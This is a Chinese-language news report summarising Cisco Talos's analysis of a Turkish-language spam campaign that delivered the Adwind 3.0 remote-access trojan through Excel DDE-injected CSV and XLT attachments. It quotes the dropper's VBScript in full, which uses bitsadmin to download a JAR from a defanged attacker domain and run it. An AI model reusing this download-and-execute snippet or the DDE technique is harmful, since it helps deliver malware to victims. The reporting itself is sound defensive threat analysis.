遠端訪問木馬Adwind 3.0再現,瞄準Linux、Windows等主流作業系統
思科Talos團隊於本週一(9月24日)釋出的一篇博文中指出,他們與ReversingLabs最近發現了一場新的垃圾電子郵件活動,該活動正在分發Adwind 3.0遠端訪問木馬(RAT),而目標是三大桌面作業系統Linux、Windows和Mac OSX。
根據Talos團隊的說法,這場新的垃圾電子郵件活動最初是由ReversingLabs於9月10日發現的,攻擊者使用了Microsoft Excel動態資料交換(DDE)程式碼注入攻擊來感染目標。最終的payload被證實是Adwind RAT的一個變種,而這個變種(即Adwind 3.0)已經升級為能夠繞過惡意軟體攔截軟體的檢測。
垃圾電子郵件活動分析
思科Umbrella遙測顯示,這場活動開始於2018年8月26日,並在8月28日達到峰值。
Umbrella還顯示,75%的請求來自土耳其。但這並沒有讓Talos團隊感到驚訝,因為所有這些垃圾電子郵件均是採用土耳其語編寫的。一些目標也位於德國,考慮到德國有一個重要的土耳其社群,這也就不奇怪了。
以下是一封垃圾電子郵件示例,攻擊者試圖通過一封關於鞋子成本的電子郵件來引誘潛在受害者。
在上面的垃圾電子郵件示例中,我們可以看到一個CSV檔案附件。Talos團隊表示,還有一些垃圾電子郵件的附件使用的是帶有.XLT副檔名的檔案。
Microsoft Excel dropper
正如上面所提到的那樣,這場活動至少涉及到兩種不同版本的dropper,它們分別使用.csv或.xlt副檔名,預設情況下由Microsoft Excel開啟。兩個版本的dropper的目的都是利用DDE程式碼注入技術來下載Adwind 3.0。雖然這種注入技術是眾所周知的,但Talos團隊表示,在他們撰寫博文時,被注入的Adwind 3.0仍未被惡意軟體攔截軟體檢測出來。
進一步的分析表明,dropper檔案可以是下表中的任何副檔名。在預設情況下,雖然並非所有的檔案型別都將由Microsoft Excel開啟,但仍然可以通過一個帶有這些副檔名之一作為引數的指令碼來啟動Microsoft Excel,以開啟對應的檔案。
在這場活動中,注入程式碼的目的是使用以下內來建立和執行一個VBScript指令碼:
Set WXWYKNRG = CreateObject("Wscript.Shell")
WXWYKNRG.Run "cmd /c bitsadmin /transfer 8 /download hxxp://erayinsaat[.]live %temp%\NMUWYTGO.jar&%temp%\NMUWYTGO.jar",0,True
該指令碼將使用bitasdmin(微軟提供的一種工具,用於下載或上傳作業並監控其進度)獲取最終的payload。這個payload是一個Java歸檔檔案。
Java payload
Java程式碼包含一個名為“Allatori Obfuscator version 4.7”的程式碼混淆器。
Talos團隊將經過混淆處理的惡意軟體識別為Adwind RAT v3.0。Adwind是一眾所周知的多平臺RAT,可能有多種配置。Talos團隊表示,他們測試的樣本被配置為在Windows、Linux和Mac OSX上實現永續性。
Adwind v3.0已經被多個惡意組織所使用過。它允許攻擊者執行任何型別的命令、記錄擊鍵、捕獲螢幕截圖、拍照或傳輸檔案。在過去,它曾被用於開展加密貨幣挖掘活動,並專注於航空業。